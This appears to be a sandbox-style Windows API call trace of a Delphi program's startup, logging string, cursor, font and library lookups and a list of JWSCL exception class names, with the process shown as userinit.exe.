[0202.010] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0202.010] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0202.010] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0202.010] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0202.010] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0202.010] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0202.010] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0202.010] GetDC (hWnd=0x0) returned 0x56010821
[0202.010] GetDeviceCaps (hdc=0x56010821, index=90) returned 96
[0202.010] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.010] GetDC (hWnd=0x0) returned 0x56010821
[0202.010] GetDeviceCaps (hdc=0x56010821, index=104) returned 0
[0202.010] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.010] CreatePalette (plpal=0x10f23c) returned 0x3108086d
[0202.010] GetStockObject (i=7) returned 0x1b00017
[0202.011] GetStockObject (i=5) returned 0x1900015
[0202.011] GetStockObject (i=13) returned 0x18a002e
[0202.011] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0202.011] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0202.011] LoadStringA (in: hInstance=0x2940000, uID=0xff3d, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0202.011] LoadStringA (in: hInstance=0x2940000, uID=0xff3c, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0202.011] LoadStringA (in: hInstance=0x2940000, uID=0xff3b, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0202.011] LoadStringA (in: hInstance=0x2940000, uID=0xff3a, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0202.011] LoadStringA (in: hInstance=0x2940000, uID=0xff39, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0202.011] LoadStringA (in: hInstance=0x2940000, uID=0xff38, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0202.011] LoadStringA (in: hInstance=0x2940000, uID=0xff37, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0202.011] LoadStringA (in: hInstance=0x2940000, uID=0xff36, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0202.011] LoadStringA (in: hInstance=0x2940000, uID=0xff35, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0202.011] LoadStringA (in: hInstance=0x2940000, uID=0xff34, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0202.011] LoadStringA (in: hInstance=0x2940000, uID=0xff33, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0202.011] LoadStringA (in: hInstance=0x2940000, uID=0xff32, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0202.011] LoadStringA (in: hInstance=0x2940000, uID=0xff31, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0202.011] LoadStringA (in: hInstance=0x2940000, uID=0xff30, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0202.011] LoadStringA (in: hInstance=0x2940000, uID=0xff4f, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0202.011] LoadStringA (in: hInstance=0x2940000, uID=0xff4e, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0202.011] LoadStringA (in: hInstance=0x2940000, uID=0xff4d, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0202.011] LoadStringA (in: hInstance=0x2940000, uID=0xff4c, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0202.011] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0202.012] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0202.012] GetCurrentThreadId () returned 0x8d8
[0202.012] GlobalAddAtomA (lpString="WndProcPtr02940000000008D8") returned 0xc0e9
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xfefc, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xfefb, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xfefa, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xfef9, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xfef8, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xfef7, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xfef6, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xfef5, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xfef4, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xfef3, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xfef2, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xfef1, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xfef0, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xff0f, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xff0e, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xff0d, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xff0c, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xff0b, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xff0a, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xff09, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xff08, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xff07, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xff06, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xff05, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xff04, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xff03, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xff02, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xff01, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xff00, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xff1f, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0202.012] LoadStringA (in: hInstance=0x2940000, uID=0xff1e, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0202.013] LoadStringA (in: hInstance=0x2940000, uID=0xff1d, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0202.013] LoadStringA (in: hInstance=0x2940000, uID=0xff1c, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0202.013] LoadStringA (in: hInstance=0x2940000, uID=0xff1b, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0202.013] LoadStringA (in: hInstance=0x2940000, uID=0xff1a, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0202.013] LoadStringA (in: hInstance=0x2940000, uID=0xff19, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0202.013] LoadStringA (in: hInstance=0x2940000, uID=0xff18, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0202.013] LoadStringA (in: hInstance=0x2940000, uID=0xff17, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0202.013] LoadStringA (in: hInstance=0x2940000, uID=0xff16, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0202.013] LoadStringA (in: hInstance=0x2940000, uID=0xff15, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0202.013] LoadStringA (in: hInstance=0x2940000, uID=0xff14, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0202.013] LoadStringA (in: hInstance=0x2940000, uID=0xff13, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0202.013] LoadStringA (in: hInstance=0x2940000, uID=0xff12, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0202.013] LoadStringA (in: hInstance=0x2940000, uID=0xff11, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0202.013] LoadStringA (in: hInstance=0x2940000, uID=0xff10, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0202.013] LoadStringA (in: hInstance=0x2940000, uID=0xff2f, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0202.013] LoadStringA (in: hInstance=0x2940000, uID=0xff2e, lpBuffer=0x10f238, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0202.013] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0202.013] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0202.013] GetVersion () returned 0x1db10106
[0202.014] GetCurrentProcessId () returned 0x980
[0202.014] GlobalAddAtomA (lpString="Delphi00000980") returned 0xc0ee
[0202.014] GetCurrentThreadId () returned 0x8d8
[0202.014] GlobalAddAtomA (lpString="ControlOfs02940000000008D8") returned 0xc0e8
[0202.014] RegisterClipboardFormatA (lpszFormat="ControlOfs02940000000008D8") returned 0xc18d
[0202.014] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0202.014] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0202.014] GetSystemMetrics (nIndex=19) returned 1
[0202.014] GetSystemMetrics (nIndex=75) returned 1
[0202.014] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2a61320, fWinIni=0x0 | out: pvParam=0x2a61320) returned 1
[0202.014] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0202.014] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0202.014] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7ff9) returned 0xf01a9
[0202.014] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0202.014] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0202.014] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0202.014] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7ffa) returned 0x15022d
[0202.015] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7ffb) returned 0x120229
[0202.015] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7ffc) returned 0x13021d
[0202.015] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7ffd) returned 0x130219
[0202.015] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7fff) returned 0x140217
[0202.015] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7ffe) returned 0x130215
[0202.016] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0202.016] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0202.016] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0202.016] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0202.016] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0202.016] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0202.016] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0202.016] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0202.016] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0202.016] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0202.016] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0202.016] GetDC (hWnd=0x0) returned 0x56010821
[0202.016] GetDeviceCaps (hdc=0x56010821, index=90) returned 96
[0202.016] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.016] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0202.016] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x2999a60, dwData=0x2a6156c) returned 1
[0202.016] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x10f5a3, fWinIni=0x0 | out: pvParam=0x10f5a3) returned 1
[0202.016] CreateFontIndirectA (lplf=0x10f5a3) returned 0xbc0a0899
[0202.016] GetObjectA (in: h=0xbc0a0899, c=60, pv=0x10f394 | out: pv=0x10f394) returned 60
[0202.017] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x10f44f, fWinIni=0x0 | out: pvParam=0x10f44f) returned 1
[0202.017] CreateFontIndirectA (lplf=0x10f52b) returned 0x6c0a085c
[0202.017] GetObjectA (in: h=0x6c0a085c, c=60, pv=0x10f394 | out: pv=0x10f394) returned 60
[0202.017] CreateFontIndirectA (lplf=0x10f4ef) returned 0x420a089b
[0202.017] GetObjectA (in: h=0x420a089b, c=60, pv=0x10f394 | out: pv=0x10f394) returned 60
[0202.017] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0202.017] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x10f503, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0202.017] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x10f503 | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0202.017] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x250000
[0202.018] GetKeyboardLayoutList (in: nBuff=64, lpList=0x10f484 | out: lpList=0x10f484) returned 1
[0202.018] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0202.018] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0202.019] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d740000
[0202.019] GetProcAddress (hModule=0x6d740000, lpProcName="InitializeFlatSB") returned 0x6d77266f
[0202.019] GetProcAddress (hModule=0x6d740000, lpProcName="UninitializeFlatSB") returned 0x6d772542
[0202.019] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_GetScrollProp") returned 0x6d771d29
[0202.019] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_SetScrollProp") returned 0x6d77238d
[0202.019] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7720c9
[0202.020] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d771fdb
[0202.020] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_GetScrollRange") returned 0x6d771e8d
[0202.020] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d771f0f
[0202.020] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_GetScrollPos") returned 0x6d771ccd
[0202.020] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_SetScrollPos") returned 0x6d77216d
[0202.020] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7722be
[0202.020] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7721e2
[0202.020] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0202.020] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0202.020] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0202.020] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0202.020] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0202.020] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0202.020] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0202.021] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0202.021] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0202.021] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0202.021] LoadStringA (in: hInstance=0x2940000, uID=0xff59, lpBuffer=0x10f1e4, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0202.021] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0202.021] LoadStringA (in: hInstance=0x2940000, uID=0xff5a, lpBuffer=0x10f1e4, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0202.021] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0202.021] LoadStringA (in: hInstance=0x2940000, uID=0xff5b, lpBuffer=0x10f1e4, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0202.021] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0202.021] LoadStringA (in: hInstance=0x2940000, uID=0xff5c, lpBuffer=0x10f1e4, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0202.021] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0202.021] SetErrorMode (uMode=0x8000) returned 0x1
[0202.021] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6d720000
[0202.023] SetErrorMode (uMode=0x1) returned 0x8000
[0202.023] GetProcAddress (hModule=0x6d720000, lpProcName="OleCreatePropertyFrame") returned 0x6d7220ea
[0202.024] GetProcAddress (hModule=0x6d720000, lpProcName="OleCreateFontIndirect") returned 0x6d7220b7
[0202.024] GetProcAddress (hModule=0x6d720000, lpProcName="OleCreatePictureIndirect") returned 0x6d7220c8
[0202.024] GetProcAddress (hModule=0x6d720000, lpProcName="OleLoadPicture") returned 0x6d7220d9
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2fa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x2a2fa98*="EJwsclUnsupportedException") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2fa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x2a2fa80*="EJwsclPIDException") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2fa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x2a2fa68*="EJwsclJwShellExecuteException") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2fa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x2a2fa50*="EJwsclShellExecuteException") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2fa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x2a2fa38*="EJwsclElevationException") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2fa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x2a2fa20*="EJwsclAbortException") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2fa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x2a2fa08*="EJwsclSuRunErrorException") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2f9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x2a2f9f0*="EJwsclElevateProcessException") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2f9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x2a2f9d8*="EJwsclCertApiException") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2f9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x2a2f9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2f9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x2a2f9a8*="EJwsclInvalidStartupInfo") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2f990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x2a2f990*="EJwsclFirewallNoExceptionsException") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2f978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x2a2f978*="EJwsclFirewallInactiveException") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2f960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x2a2f960*="EJwsclFirewallDelRuleException") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2f948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x2a2f948*="EJwsclAddUdpPortToFirewallException") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2f930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x2a2f930*="EJwsclAddTcpPortToFirewallException") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2f918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x2a2f918*="EJwsclFirewallAddRuleException") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2f900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a2f900*="EJwsclSetRemoteAdminAdressException") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2f8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a2f8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2f8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a2f8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0202.024] SysReAllocStringLen (in: pbstr=0x2a2f8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a2f8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a2f8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a2f888*="EJwsclGetIncomingPingAllowedException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a2f870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a2f858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x2a2f840*="EJwsclGetFWStateException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x2a2f828*="EJwsclSetFWStateException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x2a2f810*="EJwsclFirewallProfileInitException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x2a2f7f8*="EJwsclFirewallInitException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x2a2f7e0*="EJwsclGenericFirewallException") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x2a2f7c8*="EJwsclEnumerateProcessFailed") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x2a2f7b0*="EJwsclInvalidRegistryPath") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x2a2f798*="EJwsclEndOfStream") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x2a2f780*="EJwsclClassTypeMismatch") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x2a2f768*="EJwsclInvalidHandle") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x2a2f750*="EJwsclInvalidIndex") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x2a2f738*="EJwsclInvalidSession") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x2a2f720*="EJwsclMissingEvent") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x2a2f708*="EJwsclInvalidPointerType") returned 1
[0202.025] SysReAllocStringLen (in: pbstr=0x2a2f6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x2a2f6f0*="EJwsclCreateProcessFailed") returned 1
